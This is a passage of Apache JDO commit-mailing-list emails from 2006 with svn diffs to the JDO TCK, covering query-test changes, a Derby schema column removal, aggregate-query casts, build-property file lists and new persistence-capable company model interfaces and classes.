db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeletePersistentAll.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeletePersistentAll.java?view=diff&rev=443483&r1=443482&r2=443483 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeletePersistentAll.java (original) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeletePersistentAll.java Thu Sep 14 14:37:14 2006 @@ -21,7 +21,7 @@ import org.apache.jdo.tck.JDO_Test; import org.apache.jdo.tck.pc.company.CompanyModelReader; -import org.apache.jdo.tck.pc.company.Person; +import org.apache.jdo.tck.pc.company.Insurance; import org.apache.jdo.tck.query.QueryElementHolder; import org.apache.jdo.tck.query.QueryTest; import org.apache.jdo.tck.util.BatchTestRunner; @@ -58,7 +58,7 @@ /*UNIQUE*/ null, /*RESULT*/ null, /*INTO*/ null, - /*FROM*/ Person.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, @@ -72,9 +72,9 @@ /*UNIQUE*/ null, /*RESULT*/ null, /*INTO*/ null, - /*FROM*/ Person.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, - /*WHERE*/ "firstname == param", + /*WHERE*/ "carrier == param", /*VARIABLES*/ null, /*PARAMETERS*/ "String param", /*IMPORTS*/ null, @@ -96,43 +96,43 @@ /** */ public void testNoParametersAPI() { deletePersistentAllByAPIQuery(ASSERTION_FAILED, - VALID_QUERIES[0], null, 5); + VALID_QUERIES[0], null, 10); } /** */ public void testNoParametersSingleString() { deletePersistentAllBySingleStringQuery(ASSERTION_FAILED, - VALID_QUERIES[0], null, 5); + VALID_QUERIES[0], null, 10); } /** */ public void testObjectArrayParametersAPI() { - Object[] parameters = new Object[] {"emp1First"}; + Object[] parameters = new Object[] {"Carrier1"}; deletePersistentAllByAPIQuery(ASSERTION_FAILED, - VALID_QUERIES[1], parameters, 1); + VALID_QUERIES[1], parameters, 2); } /** */ public void testObjectArrayParametersSingleString() { - Object[] parameters = new Object[] {"emp1First"}; + Object[] parameters = new Object[] {"Carrier1"}; deletePersistentAllBySingleStringQuery(ASSERTION_FAILED, - VALID_QUERIES[1], parameters, 1); + VALID_QUERIES[1], parameters, 2); } /** */ public void testMapParametersAPI() { Map parameters = new HashMap(); - parameters.put("param", "emp1First"); + parameters.put("param", "Carrier1"); deletePersistentAllByAPIQuery(ASSERTION_FAILED, - VALID_QUERIES[1], parameters, 1); + VALID_QUERIES[1], parameters, 2); } /** */ public void testMapParametersSingleString() { Map parameters = new HashMap(); - parameters.put("param", "emp1First"); + parameters.put("param", "Carrier1"); deletePersistentAllBySingleStringQuery(ASSERTION_FAILED, - VALID_QUERIES[1], parameters, 1); + VALID_QUERIES[1], parameters, 2); } /** Modified: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeleteQueryElements.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeleteQueryElements.java?view=diff&rev=443483&r1=443482&r2=443483 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeleteQueryElements.java (original) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeleteQueryElements.java Thu Sep 14 14:37:14 2006 @@ -20,8 +20,9 @@ import org.apache.jdo.tck.JDO_Test; import org.apache.jdo.tck.pc.company.CompanyModelReader; +import org.apache.jdo.tck.pc.company.DentalInsurance; import org.apache.jdo.tck.pc.company.FullTimeEmployee; -import org.apache.jdo.tck.pc.company.Person; +import org.apache.jdo.tck.pc.company.Insurance; import org.apache.jdo.tck.query.QueryElementHolder; import org.apache.jdo.tck.query.QueryTest; import org.apache.jdo.tck.query.result.classes.FullName; @@ -57,10 +58,10 @@ /*UNIQUE*/ Boolean.TRUE, /*RESULT*/ null, /*INTO*/ null, - /*FROM*/ FullTimeEmployee.class, + /*FROM*/ DentalInsurance.class, /*EXCLUDE*/ null, - /*WHERE*/ "salary > 10000 & projects.contains(p) & " + - "p.budget > limit", + /*WHERE*/ "((FullTimeEmployee)employee).salary > 10000 & " + + "employee.projects.contains(p) & p.budget > limit", /*VARIABLES*/ "Project p", /*PARAMETERS*/ "BigDecimal limit", /*IMPORTS*/ "import org.apache.jdo.tck.pc.company.Project; " + @@ -79,9 +80,9 @@ // The query is invalid because it defines a result clause. new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "firstname, lastname", + /*RESULT*/ "carrier", /*INTO*/ null, - /*FROM*/ Person.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, @@ -95,8 +96,8 @@ new QueryElementHolder( /*UNIQUE*/ null, /*RESULT*/ null, - /*INTO*/ FullName.class, - /*FROM*/ Person.class, + /*INTO*/ String.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, @@ -110,9 +111,9 @@ // and a result class. new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "firstname, lastname", - /*INTO*/ FullName.class, - /*FROM*/ Person.class, + /*RESULT*/ "carrier", + /*INTO*/ String.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, @@ -127,13 +128,13 @@ /*UNIQUE*/ null, /*RESULT*/ null, /*INTO*/ null, - /*FROM*/ Person.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, /*PARAMETERS*/ null, /*IMPORTS*/ null, - /*GROUP BY*/ "lastname", + /*GROUP BY*/ "carrier", /*ORDER BY*/ null, /*FROM*/ null, /*TO*/ null), @@ -141,15 +142,15 @@ // and a grouping clause new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "lastname", + /*RESULT*/ "carrier", /*INTO*/ null, - /*FROM*/ Person.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, /*PARAMETERS*/ null, /*IMPORTS*/ null, - /*GROUP BY*/ "lastname", + /*GROUP BY*/ "carrier", /*ORDER BY*/ null, /*FROM*/ null, /*TO*/ null), @@ -158,14 +159,14 @@ /*UNIQUE*/ null, /*RESULT*/ null, /*INTO*/ null, - /*FROM*/ Person.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, /*PARAMETERS*/ null, /*IMPORTS*/ null, /*GROUP BY*/ null, - /*ORDER BY*/ "lastname", + /*ORDER BY*/ "carrier", /*FROM*/ null, /*TO*/ null), // The query is invalid because it defines a range clause. @@ -173,7 +174,7 @@ /*UNIQUE*/ null, /*RESULT*/ null, /*INTO*/ null, - /*FROM*/ Person.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, @@ -190,7 +191,7 @@ /*UNIQUE*/ Boolean.TRUE, /*RESULT*/ null, /*INTO*/ null, - /*FROM*/ Person.class, + /*FROM*/ Insurance.class, /*EXCLUDE*/ null, /*WHERE*/ null, /*VARIABLES*/ null, From [email protected] Thu Sep 14 21:41:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25145 invoked from network); 14 Sep 2006 21:41:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 21:41:38 -0000 Received: (qmail 91021 invoked by uid 500); 14 Sep 2006 21:41:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91010 invoked by uid 99); 14 Sep 2006 21:41:38 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 14:41:38 -0700 X-ASF-Spam-Status: No, hits=-9.8 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received: from ([161.129.204.104:59368] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id 75/D0-07618-19CC9054 for <[email protected]>; Thu, 14 Sep 2006 14:41:37 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 216941A981C; Thu, 14 Sep 2006 14:41:35 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r443485 - in /db/jdo/trunk/tck20/src/sql/derby: applicationidentity/schema9.sql datastoreidentity/schema9.sql Date: Thu, 14 Sep 2006 21:41:35 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Thu Sep 14 14:41:34 2006 New Revision: 443485 URL: http://svn.apache.org/viewvc?view=rev&rev=443485 Log: (empty) Modified: db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Modified: db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql?view=diff&rev=443485&r1=443484&r2=443485 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql (original) +++ db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql Thu Sep 14 14:41:34 2006 @@ -44,7 +44,6 @@ MIDDLENAME VARCHAR(32), BIRTHDATE VARCHAR(32) NOT NULL, DISCRIMINATOR varchar(64) NOT NULL, - EMPID INTEGER NOT NULL, ROLE VARCHAR(32), HIREDATE VARCHAR(32), WEEKLYHOURS REAL, Modified: db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql?view=diff&rev=443485&r1=443484&r2=443485 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql (original) +++ db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Thu Sep 14 14:41:34 2006 @@ -47,7 +47,6 @@ MIDDLENAME VARCHAR(32), BIRTHDATE VARCHAR(32) NOT NULL, DISCRIMINATOR varchar(64) NOT NULL, - EMPID INTEGER NOT NULL, ROLE VARCHAR(32), HIREDATE VARCHAR(32), WEEKLYHOURS REAL, From [email protected] Thu Sep 14 21:43:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25617 invoked from network); 14 Sep 2006 21:43:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 21:43:31 -0000 Received: (qmail 95507 invoked by uid 500); 14 Sep 2006 21:43:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95496 invoked by uid 99); 14 Sep 2006 21:43:31 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 14:43:31 -0700 X-ASF-Spam-Status: No, hits=-9.8 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received: from ([161.129.204.104:58983] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id 22/D0-07618-D6CC9054 for <[email protected]>; Thu, 14 Sep 2006 14:42:16 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 31C4D1A981A; Thu, 14 Sep 2006 14:40:59 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r443484 - /db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/result/AggregateResult.java Date: Thu, 14 Sep 2006 21:40:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mbo Date: Thu Sep 14 14:40:58 2006 New Revision: 443484 URL: http://svn.apache.org/viewvc?view=rev&rev=443484 Log: JDO-410: AggregateResult queries non-existent Employee.manager.salary field Modified: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/result/AggregateResult.java Modified: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/result/AggregateResult.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/result/AggregateResult.java?view=diff&rev=443484&r1=443483&r2=443484 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/result/AggregateResult.java (original) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/result/AggregateResult.java Thu Sep 14 14:40:58 2006 @@ -197,10 +197,10 @@ /*FROM*/ null, /*TO*/ null), - // SUM(manager.salary) + // SUM(((FullTimeEmployee)manager).salary) new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "SUM(manager.salary)", + /*RESULT*/ "SUM(((FullTimeEmployee)manager).salary)", /*INTO*/ null, /*FROM*/ FullTimeEmployee.class, /*EXCLUDE*/ null, @@ -213,10 +213,10 @@ /*FROM*/ null, /*TO*/ null), - // SUM(DISTINCT manager.salary) + // SUM(DISTINCT ((FullTimeEmployee)manager).salary) new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "SUM(DISTINCT manager.salary)", + /*RESULT*/ "SUM(DISTINCT ((FullTimeEmployee)manager).salary)", /*INTO*/ null, /*FROM*/ FullTimeEmployee.class, /*EXCLUDE*/ null, @@ -293,10 +293,10 @@ /*FROM*/ null, /*TO*/ null), - // MIN(manager.salary) + // MIN(((FullTimeEmployee)manager).salary) new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "MIN(manager.salary)", + /*RESULT*/ "MIN(((FullTimeEmployee)manager).salary)", /*INTO*/ null, /*FROM*/ FullTimeEmployee.class, /*EXCLUDE*/ null, @@ -373,10 +373,10 @@ /*FROM*/ null, /*TO*/ null), - // MAX(manager.salary) + // MAX(((FullTimeEmployee)manager).salary) new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "MAX(manager.salary)", + /*RESULT*/ "MAX(((FullTimeEmployee)manager).salary)", /*INTO*/ null, /*FROM*/ FullTimeEmployee.class, /*EXCLUDE*/ null, @@ -453,10 +453,10 @@ /*FROM*/ null, /*TO*/ null), - // AVG(manager.salary) + // AVG(((FullTimeEmployee)manager).salary) new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "AVG(manager.salary)", + /*RESULT*/ "AVG(((FullTimeEmployee)manager).salary)", /*INTO*/ null, /*FROM*/ FullTimeEmployee.class, /*EXCLUDE*/ null, @@ -469,10 +469,10 @@ /*FROM*/ null, /*TO*/ null), - // AVG(DISTINCT manager.salary) + // AVG(DISTINCT ((FullTimeEmployee)manager).salary) new QueryElementHolder( /*UNIQUE*/ null, - /*RESULT*/ "AVG(DISTINCT manager.salary)", + /*RESULT*/ "AVG(DISTINCT ((FullTimeEmployee)manager).salary)", /*INTO*/ null, /*FROM*/ FullTimeEmployee.class, /*EXCLUDE*/ null, @@ -532,9 +532,9 @@ (new BigDecimal("50000.00")).add(new BigDecimal("2000.99")), // SUM(budget) null, - // SUM(manager.salary) + // SUM(((FullTimeEmployee)manager).salary) new Double(20000), - // SUM(DISTINCT manager.salary) + // SUM(DISTINCT ((FullTimeEmployee)manager).salary) new Double(10000), // MIN(long) new Long(1), @@ -544,7 +544,7 @@ new BigDecimal("2000.99"), // MIN(budget) null, - // MIN(manager.salary) + // MIN(((FullTimeEmployee)manager).salary) new Double(10000), // MAX(long) new Long(5), @@ -554,7 +554,7 @@ new BigDecimal("2500000.99"), // MAX(budget) null, - // MAX(manager.salary) + // MAX(((FullTimeEmployee)manager).salary) new Double(10000), // AVG(long) new Long(3), @@ -564,9 +564,9 @@ new BigDecimal("99.999"), // AVG(lifetimeOrthoBenefit) null, - // AVG(manager.salary) + // AVG(((FullTimeEmployee)manager).salary) new Double(10000), - // AVG(DISTINCT manager.salary) + // AVG(DISTINCT ((FullTimeEmployee)manager).salary) new Double(10000) }; From [email protected] Thu Sep 14 22:42:59 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38744 invoked from network); 14 Sep 2006 22:42:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 22:42:59 -0000 Received: (qmail 8888 invoked by uid 500); 14 Sep 2006 22:42:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8877 invoked by uid 99); 14 Sep 2006 22:42:58 -0000 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 15:42:58 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 2BB7D1A981D; Thu, 14 Sep 2006 15:42:08 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r443505 - /db/jdo/trunk/tck20/project.properties Date: Thu, 14 Sep 2006 22:42:07 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Thu Sep 14 15:42:06 2006 New Revision: 443505 URL: http://svn.apache.org/viewvc?view=rev&rev=443505 Log: JDO-422 Modified: db/jdo/trunk/tck20/project.properties Modified: db/jdo/trunk/tck20/project.properties URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/project.properties?view=diff&rev=443505&r1=443504&r2=443505 ============================================================================== --- db/jdo/trunk/tck20/project.properties (original) +++ db/jdo/trunk/tck20/project.properties Thu Sep 14 15:42:06 2006 @@ -103,6 +103,17 @@ org/apache/jdo/tck/pc/company/MedicalInsurance.java \ org/apache/jdo/tck/pc/company/PartTimeEmployee.java \ org/apache/jdo/tck/pc/company/Project.java \ + org/apache/jdo/tck/pc/company/IAddress.java \ + org/apache/jdo/tck/pc/company/ICompany.java \ + org/apache/jdo/tck/pc/company/IDepartment.java \ + org/apache/jdo/tck/pc/company/IPerson.java \ + org/apache/jdo/tck/pc/company/IEmployee.java \ + org/apache/jdo/tck/pc/company/IFullTimeEmployee.java \ + org/apache/jdo/tck/pc/company/IInsurance.java \ + org/apache/jdo/tck/pc/company/IDentalInsurance.java \ + org/apache/jdo/tck/pc/company/IMedicalInsurance.java \ + org/apache/jdo/tck/pc/company/IPartTimeEmployee.java \ + org/apache/jdo/tck/pc/company/IProject.java \ org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.java \ org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.java \ org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.java \ @@ -110,6 +121,13 @@ org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.java \ org/apache/jdo/tck/pc/companyMapWithoutJoin/Insurance.java \ org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/ICompany.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IDepartment.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IPerson.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IEmployee.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IInsurance.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.java \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.java \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.java \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.java \ @@ -215,12 +233,29 @@ org/apache/jdo/tck/pc/company/MedicalInsurance.class \ org/apache/jdo/tck/pc/company/PartTimeEmployee.class \ org/apache/jdo/tck/pc/company/Project.class \ + org/apache/jdo/tck/pc/company/IAddress.class \ + org/apache/jdo/tck/pc/company/ICompany.class \ + org/apache/jdo/tck/pc/company/IDepartment.class \ + org/apache/jdo/tck/pc/company/IPerson.class \ + org/apache/jdo/tck/pc/company/IEmployee.class \ + org/apache/jdo/tck/pc/company/IFullTimeEmployee.class \ + org/apache/jdo/tck/pc/company/IInsurance.class \ + org/apache/jdo/tck/pc/company/IDentalInsurance.class \ + org/apache/jdo/tck/pc/company/IMedicalInsurance.class \ + org/apache/jdo/tck/pc/company/IPartTimeEmployee.class \ + org/apache/jdo/tck/pc/company/IProject.class \ org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.class \ org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.class \ org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.class \ org/apache/jdo/tck/pc/companyMapWithoutJoin/Employee.class \ org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.class \ org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/ICompany.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IDepartment.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IPerson.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IEmployee.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.class \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.class \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.class \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.class \ From [email protected] Tue Sep 19 22:30:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9061 invoked from network); 19 Sep 2006 22:30:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Sep 2006 22:30:11 -0000 Received: (qmail 21517 invoked by uid 500); 19 Sep 2006 22:30:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21499 invoked by uid 99); 19 Sep 2006 22:30:11 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Sep 2006 15:30:11 -0700 X-ASF-Spam-Status: No, hits=-9.8 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received: from ([161.129.204.104:51243] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id DE/7D-28275-B6F60154 for <[email protected]>; Tue, 19 Sep 2006 15:30:03 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id E9D101A981D; Tue, 19 Sep 2006 15:30:00 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r447999 [2/2] - in /db/jdo/trunk/tck20: ./ src/conf/ src/java/org/apache/jdo/tck/mapping/ src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/ src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyListWithoutJoin/ src/jdo/datastoreiden... Date: Tue, 19 Sep 2006 22:29:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPartTimeEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPartTimeEmployee.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPartTimeEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPartTimeEmployee.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,28 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +/** + * This interface represents the persistent state of PartTimeEmployee. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IPartTimeEmployee extends IEmployee { + + double getWage(); + void setWage(double wage); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPerson.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPerson.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPerson.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/IPerson.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,40 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.util.Date; + +/** + * This interface represents the persistent state of Person. + * Javadoc was deliberately omitted because it would distract from + * the purpose of the interface. + */ +public interface IPerson { + + long getPersonid(); + String getLastname(); + String getFirstname(); + String getMiddlename(); + Date getBirthdate(); + + void setPersonid(long personid); + void setLastname(String lastname); + void setFirstname(String firstname); + void setMiddlename(String middlename); + void setBirthdate(Date birthdate); + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/PartTimeEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/PartTimeEmployee.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/PartTimeEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/PartTimeEmployee.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,106 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.util.Date; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents a part-time employee. + */ +public class PartTimeEmployee extends Employee implements IPartTimeEmployee { + private double wage; + + /** This is the JDO-required no-args constructor. The TCK relies on + * this constructor for testing PersistenceManager.newInstance(PCClass). + */ + public PartTimeEmployee() {} + + /** + * Construct a part-time employee. + * @param personid The identifier for the person. + * @param first The person's first name. + * @param last The person's last name. + * @param middle The person's middle name. + * @param born The person's birthdate. + * @param hired The date the person was hired. + * @param wage The person's wage. + */ + public PartTimeEmployee(long personid, String first, String last, + String middle, Date born, + Date hired, double wage ) { + super(personid, first, last, middle, born, hired); + this.wage = wage; + } + + /** + * Get the wage of the part-time employee. + * @return The wage of the part-time employee. + */ + public double getWage() { + return wage; + } + + /** + * Set the wage of the part-time employee. + * @param wage The wage of the part-time employee. + */ + public void setWage(double wage) { + this.wage = wage; + } + + /** + * Returns a String representation of a <code>PartTimeEmployee</code> object. + * @return a String representation of a <code>PartTimeEmployee</code> object. + */ + public String toString() { + return "PartTimeEmployee(" + getFieldRepr() + ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + public String 